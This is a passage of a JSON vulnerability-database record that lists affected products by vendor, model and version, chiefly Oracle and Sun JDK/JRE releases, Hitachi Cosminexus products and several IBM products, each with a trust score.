1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0107-00" }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.0" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.2" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "domino", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "8.5.3 fix pack 6" }, { "model": "domino", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "9.0.1 fix pack 1" }, { "model": "fabric manager", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "4.1.00.22" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for ach services 2.1.1.0" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for check services 2.1.1.2" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for check services 2.1.1.5" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for corporate payment services 2.1.1.0" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 2.1" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 2.2" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 3.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.2" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.2.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 9.7" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "1.0.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.2.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 1.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 2.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.2" }, { "model": "lotus quickr", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.5 for websphere portal" }, { "model": "notes", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "8.5.3 fix pack 6" }, { "model": "notes", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "9.0.1 fix pack 1" }, { "model": "security access manager for mobile the appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "security access manager for mobile software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "security access manager for web the appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "security access manager for web software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.1 to 2.1 fix pack 4" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fix pack 1" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "rational connector for sap solution manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "4.0.0.x" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.0 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.1 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.3 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.4 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "live 6.3 (saas offering)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "live 7.0 (saas offering)" }, { "model": "websphere cast iron cloud integration virtual appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "websphere cast iron cloud integration physical appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 61" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 71" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 51" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 61" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 71" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 51" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8" }, { "model": "java se", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "embedded 7 update 51" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus studio 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-50" }, { "model": "cosminexus application server standard 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, 